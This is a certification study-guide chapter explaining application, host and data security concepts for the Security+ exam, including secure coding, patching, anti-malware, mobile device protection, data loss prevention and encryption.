Application, Host and Data Security
Any attempt to secure computers and networks against security threats should take into account the different vulnerabilities of computer networks and the best methods to mitigate attacks aimed at those vulnerabilities. A network with perfect communications security but no access control is still an extremely vulnerable network. To protect our data and communications, we need to consider how to mitigate and counter application, host, and data security risks.
In this chapter, we will discuss security as it pertains to your applications, data, and host computer systems. It is important to secure networks and physically secure systems, but applications must be patched and hardened, data should be protected through techniques such as encryption, and company computers should be secured so data cannot be compromised, nor sessions hijacked. The core Security+ exam objectives covered in this chapter are as follows:
- Explain the importance of application security
- Carry out appropriate procedures to establish host security
- Explain the importance of data security
Importance of Application Security
Applications can allow computers to perform an immense number of tasks, but they can also open up a host to unwanted exploitation and vulnerability. If an application has access to edit locally stored files, but is vulnerable to unauthorized control, your locally stored files become vulnerable to unauthorized control. In this section, we will be looking at a number of security practices and principles that can enhance the security of applications. This section will cover the following topics:
- Secure coding concepts
- Cross-site scripting (XSS) prevention
- Cross-site request forgery (XSRF) prevention
- Application configuration baseline (proper settings)
- Application hardening
- Application patch management
Fuzzing is the practice of sending a large collection of unexpected inputs to an application in hopes that the application will sometimes react in a manner the program’s creators did not intend. This may result in a simple denial of service, access to unexpected data, or even access to the computer on which the application is hosted.
Using an application to generate an extremely large range of inputs (i.e., a fuzzing engine) is the most common way fuzzing is used to test an application. It is impractical to generate these inputs manually, but the use of the fuzzing engine allows a large number of inputs to be tested quickly and records the responses of the application. Fuzzing allows attackers to find vulnerabilities in the way closed-source applications process inputs. If the developer has not designed the application in such a way as to validate or process all possible inputs, fuzzing is one way to discover any exploits.
Secure Coding Concepts
When it comes to making a securely coded application, it is much more difficult to transform an already written insecure program into a secure one than to program with security in mind from the beginning. Security is not something added on later, but, rather, it is an important consideration at every step in development.
One basic secure coding concept is error and exception handling, ensuring that when a program cannot perform a given task, it fails gracefully and securely. Rather than a runtime error being displayed to the user, the application should generally catch the error and display or log error information chosen by the developer, rather than a default error message from the OS or scripting language. A mishandled exception may allow an attacker an opportunity to exploit your code.
Another basic secure coding concept is input validation, allowing only inputs that match a certain format or range. A first name field, for instance, would not allow special characters such as a semicolon or the equals sign to limit the availability of scripting attacks. Secure coding concepts assist in hardening applications against attacks, which is a concept discussed later in this section.
Cross-site Scripting (XSS) Prevention
Oftentimes, a browser will execute scripts that are presented to it. Whenever this is done maliciously, it is considered a cross-site scripting (XSS) attack. Any application that accepts inputs from a web interface should validate the inputs to protect against the possibility of an attacker injecting malicious scripts, especially if one user’s input will be presented to other users. Input validation can protect your site from becoming a launch pad for XSS attacks.
Cross-site Request Forgery (XSRF) Prevention
In a cross-site request forgery (XSRF) attack, the attacker impersonates a different authenticated user and uses their authentication to access information the attacker should not have access to. To protect against XSRF attacks, the authentication process should be encrypted and authenticated sessions should be terminated regularly to prevent session hijacking.
Application Configuration Baseline (Proper Settings)
To ensure basic application security, your organization must set a basic standard for the use of applications, or an application configuration baseline. Does your organization require the use of a certain browser, or the use of a certain version of that browser? Do macros and scripting need to be disabled, or is the tradeoff in usability versus security not worth it? The application baseline is the established minimum for applications in your environment. Every host in your environment should meet this baseline.
Application hardening is the process by which applications can be made more secure. Application hardening includes code reviews, the application of a security baseline, and application configuration settings. A hardened application will apply a number of principles and practices, such as changing default authentication information, allowing the least necessary privileges for the application to function, and limiting the attack area of the application by disabling unnecessary application components. Another major change made to ensure application hardening is changing default passwords on any applications, such as databases, or any appliances, such as routers, as default usernames and passwords are easily found on the Internet and can be used to gain access.
Any and all changes made to an application to make the application more difficult to attack are examples of application hardening, whether those changes are made in the design and development of an application or made to the configuration of an already deployed application.
Application Patch Management
Once a security baseline has been established, it will need to be constantly revised to take into account new application versions, which may add new features or fixes for security vulnerabilities. Many applications can be upgraded on an individual basis, but for large environments, it may not be practical for updates to be made on a computer-by-computer basis.
When new application patches or versions are released, an administrator should determine whether the patch would help or hinder normal operations, and update the applications and application baseline if necessary. Not every new version will increase security or have features worth upgrading to. The new version can be rolled out to the hosts that want new features or, if the application baseline is updated, to all hosts.
Appropriate Procedures to Establish Host Security
Application security can help to close some of the doors that might provide access to a system. Unfortunately, those applications, however secure, have to run on a host that may also be vulnerable to attack. Fortunately, there are a number of steps that may be taken to increase the security of the hosts the applications rely on. This section will cover the following topics:
- Operating system security and settings
- Patch management
- Hardware security
- Host software baselining
- Mobile devices
Operating System Security and Settings
One of the most basic steps to take to improve the security of a host is to configure it according to common security principles, such as least access permissions, minimum attack surface, and a patch level that protects the system against known threats.
The user accounts on any system should be granted the permissions necessary to perform the authorized tasks, and no more. The operating system should have all the bells and whistles in use enabled, and no more. The system should be regularly updated to ensure known threats are no longer a threat to the operating system.
Though often conflated, anti-virus and anti-malware are not identical. Anti-malware generally focuses on detecting a wide range of threats to a host, while anti-virus is concerned with only viruses. For instance, anti-malware may protect against phishing or pharming attacks, as well as adware or Trojans that traditional anti-virus software would protect against.
A host-based intrusion prevention system (HIPS) is a very common type of anti-malware. One of the most effective methods to raise the security level of any host is to disable unneeded services and ensure the host is running a HIPS with current signatures or definitions.
Some classes of anti-malware specialize in defeating a specific type of threat, rather than protecting a host from general classes of threats.
Anti-virus software is concerned with detecting and preventing damage from Trojans, worms, and viruses.
Anti-spam software attempts to determine whether e-mail is from a legitimate source or is unsolicited commercial bulk e-mail. E-mail determined to be legitimate is presented to the user, while suspect or illegitimate e-mail is removed from the user’s sight.
Some applications may expose personal details, from browsing history to passwords entered into a PC, to an unauthorized third party. Anti-spyware is concerned with preventing applications from gathering personal data from a host.
Pop-up blockers and anti-adware programs strive to eliminate the relatively safe yet annoying programs that can load pop-ups or additional advertisements on a user’s computer.
The host-based firewall takes a different approach to controlling malware. Rather than attempting to detect malware as it runs, the host-based firewall attempts to control rogue programs by denying them Internet access. Any program attempting to access the network on a host running a host-based firewall must first be granted permission by the firewall’s administrator. By default, unauthorized communication should be blocked.
Just as with application patching, operating system patching can protect your systems against risks as they are identified. Applying current patches to an operating system is the single most efficient way to protect an operating system against known vulnerabilities.
To ensure patches do not interfere with the expected operation of a system, it is recommended to install patches on a non-critical test machine before deploying them on all hosts in an organization.
While we often think of computer security as something that happens in the digital realm, there are also physical steps that can be taken to protect the security of your systems.
A cable lock for a computer works just like a cable lock for a bicycle. A cable lock attaches an otherwise mobile asset to a far less mobile object. This keeps anyone from walking away with the locked equipment. As with any cable lock, a computer cable lock is a deterrent, but given sufficient time or preparation, it may be defeated.
Sensitive data or equipment that must be kept in place without risk of loss is often stored in a safe. Many safes, in addition to preventing access to their contents, will protect against environmental damage, such as from water or fire. A safe is a great choice for physically securing smaller items, such as backup media, or valuable small hardware, such as laptops.
For securing larger equipment or a greater quantity of equipment, an administrator might employ locking cabinets or racks. The great benefit of locking racks is that the physical security of the cabinet contents can be assured while still allowing the equipment to remain in use. Even in a shared environment, such as a co-located data center, locking cabinets can effectively control physical access to your hardware.
Host Software Baselining
Basic host security should be set at an enterprise level. Whenever a new host is brought into the network, care should be taken to ensure that the OS and applications meet the established software baseline. A successful attack on the OS of a system can grant access to any data the host has access to, and a successful exploit of an application can grant an attacker access to any data that passes through the application. Best practices need to be followed on each host to bring the software in line with the enterprise security baseline, avoiding a weak link that can be exploited.
Ensuring the physical security of mobile devices such as smart phones is very rarely practical. Because the hardware is a target for thieves, or is easily misplaced, the primary concern with mobile devices is usually ensuring the security of the information on the device.
There are a number of methods that may be employed to make it more difficult for an attacker to get access to the private contents of a device in their possession.
Simply requiring a password to activate a device presents a hurdle that a casual attacker will find difficult to overcome. Requiring even a simple password to unlock the screen of a device that has not been used for a short period of time adds a fundamental level of security.
Most mobile devices will support a stronger password than a simple number code. If a password is simple, it may be easy to deduce from shoulder surfing or examining the smudges left on a smart phone screen. A complex or strong password makes these types of attacks less likely.
Even if an attacker cannot unlock a device, they may be able to read the data saved on the device, especially in the case of a laptop or other commodity hardware. To prevent data from being accessible to an attacker, many devices support encryption of all data stored on the device. Encrypted data cannot be read by an attacker, even if the attacker has physical and read access to the device. This, along with remotely wiping or sanitizing the device, is one of the best methods of ensuring security of data on a mobile device.
When devices are lost or stolen, there is always some risk that even strong encryption will eventually fail. To ensure the privacy of all the data on a lost or stolen device, the best and most surefire way is to remove the data from the device remotely. Many devices support this “remote wipe” functionality to send a command to a device in communication range that will cause it to remove all personal data from the device. This, along with data encryption, is the strongest method to protect data on a mobile device.
Data encryption protects your data even if the device is out of communication range, and remote wipe protects your data by permanently removing it once the device enters communication range.
You may also want to prevent eavesdroppers from monitoring any communications sent over a mobile device, especially if the phone is often used for especially sensitive conversations. Most mobile phones do not perform strong encryption of voice communications. Certain mobile phones are capable of performing on-the-fly voice encryption. This type of strong encryption in a mobile device is rare, and may require specialized hardware. This is a CPU-intensive process, and it will require much more processing power than a standard non-encrypted phone call. Even accounting for all the drawbacks, for the most sensitive types of conversations, voice encryption can be a great option.
Many mobile devices have a built-in GPS functionality. Because the device has GPS, it now knows where it is. This can be of great help when locating a lost device. One drawback is that the device may now be used by an attacker to gather location information on the carrier of the device. The GPS tracking can often be disabled, limiting the functionality of the phone but protecting against the possibility of the GPS data being accessed by an unauthorized party.
Virtualization provides a number of benefits, as far as hardware efficiency is concerned, but it comes with a new set of risks that should be considered. Virtualized hosts on a single piece of hardware are able to communicate with each other, for instance, but standard network monitoring software is incapable of monitoring communications between hosts.
Virtual hosts have the same security requirements as physical hosts do. Installing a host-based firewall and an anti-virus app on one virtual machine will not protect the other virtual machines on the same piece of hardware. Any host-level security steps must be repeated for each virtual host in your environment.
The lower the level an attack is able to target in a system, the greater the control an attack will grant an attacker. Just as a high-level attack on an application will grant access to whatever the application has access to, a lower-level attack on the OS will grant access to whatever the OS has access to, including applications. On a virtual host, all the applications and operating systems are sitting on top of an even lower layer, the virtual machine manager, or hypervisor. This means that a successful attack on the physical host of multiple virtual machines can grant an attacker control over multiple virtual machines.
Importance of Data Security
In an enterprise environment, there is nothing more important to your company than your data. A major consideration when keeping your data safe is the question “Can others, namely hackers and other people with malicious intent, access this data?” If you have sufficiently configured data loss prevention and encryption, the two major topics of this section, you should be able to answer such a question with a resounding “No.” This section will cover the following topics:
- Data Loss Prevention (DLP)
- Data encryption
- Hardware-based encryption devices
- Cloud computing
Data Loss Prevention
Data Loss Prevention (DLP) is an important feature of networks. There are three types of DLP: Endpoint, Storage, and Network. Endpoint protects data while in use on the client computer; Storage protects data while residing on servers; and Network protects data that is in transit over a network. All of these mechanisms are tools against data loss or inappropriate data transmission, such as the e-mailing of confidential files, copying data to USB drives, employees bringing in and using personal music devices, or having shared folders with incorrect permissions assigned to them.
Installing DLP controls on all computers, along with proper policy and acceptable use training, is one of the best ways to ensure data is safe and not leaked or lost.
Lastly, when replacing hard drives, old drives should be sanitized by overwriting the drive over and over again to ensure all data has been destroyed.
A major component of data security today is data encryption. Simply put, data encryption rewrites data using an encoding mechanism that is only readable if you have the key to unlock it. Encryption comes in many forms and strengths; we will talk about a few here.
Full disk encryption, or full-volume encryption, is a popular type of encryption on workstations where sensitive data is contained. This can be accomplished using a Trusted Platform Module, or TPM (covered later).
Much important company data is contained in databases. As far as databases are concerned, keep them protected by blocking port 1433 (usually SQL Server) on your corporate firewall to keep hackers from accessing your database remotely. Also, consider encrypting your backups, as they can become compromised even as they are en route to their backup location.
Individual files can be encrypted as well. A popular method of encrypting individual files is by using EFS, or Encrypting File System, on Windows systems. EFS uses two sets of keys to ensure both speed and strength of encryption. EFS can encrypt both files and folders, and is a feature of the NTFS file system.
Hardware-based Encryption Devices
A simple fact of computing is the basic premise that all data is stored on hard drives somewhere. A great way to protect that data is using hardware-based encryption devices. These types of devices encrypt data using hardware-based encryption rather than software-based encryption, and this provides the following crucial benefits:
- Encryption is faster on hardware-based devices
- Data tends to be more secure on hardware-based encryption devices
The two main devices that perform hardware-based encryption are the Trusted Platform Module (TPM) and the Hardware Security Module (HSM). The TPM is built-in to a motherboard and contains unique encryption keys (RSA), as well as pre-boot configuration information, so it can detect any alterations to the hardware and flag it before allowing a user to unlock the operating system volume. The TPM performs two major tasks: hardware-based encryption with its unique RSA key, allowing for faster encryption, and more secure authentication, ensuring the computer has not been tampered with or hacked before booting up.
HSMs are removable encryption devices, usually cards or attached via TCP/IP, that provide cryptographic key generation, storage, and key management. HSMs are the best way to manage keys and digital certificates.
Another method of hardware-based encryption is encryption of removable storage devices, such as USB drives. This assists in keeping data saved to a portable drive secure in case it is lost.
When dealing with systems that leverage cloud computing, it is imperative to ensure tight security of the data used by those systems. As the location of data in cloud systems is not always known or concrete, it is important to have, at the very least, strong security controls in the cloud. Unfortunately, many DLP controls were created before cloud computing existed, so they may not be relevant to or work for your organization’s needs.
Data Loss Prevention (or Data Leakage Prevention) products address only confidentiality in the CIA triad, not integrity or availability. However, if your data is stored in a third-party cloud rather than your own, then even these DLP products are of little use. You must rely on endpoint DLPs to protect data as its being used.